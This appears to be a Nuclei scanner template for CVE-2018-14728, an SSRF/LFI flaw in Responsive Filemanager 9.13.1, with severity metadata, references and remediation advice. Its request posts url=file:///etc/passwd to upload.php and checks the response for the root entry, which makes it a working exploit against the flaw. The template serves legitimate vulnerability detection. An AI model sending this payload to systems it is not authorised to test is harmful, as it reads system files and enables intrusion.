43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: CVE-2018-14728
|
|
|
|
info:
|
|
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
|
|
author: madrobot
|
|
severity: critical
|
|
description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
|
|
remediation: |
|
|
Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
|
|
- https://www.exploit-db.com/exploits/45103/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-14728
|
|
- https://github.com/sobinge/nuclei-templates
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-14728
|
|
cwe-id: CWE-918
|
|
epss-score: 0.96369
|
|
epss-percentile: 0.99525
|
|
cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: tecrail
|
|
product: responsive_filemanager
|
|
tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/filemanager/upload.php"
|
|
|
|
body: fldr=&url=file:///etc/passwd
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a00473045022100b505af24e357311546c8a4a494a248180a1e6a98fd1a43f547164d50c8df1a330220773e22a98921c0d651164ccefc4d424b77d72e22da28bcff69a945e1d384777c:922c64590222798bb761d5b6d8e72950 |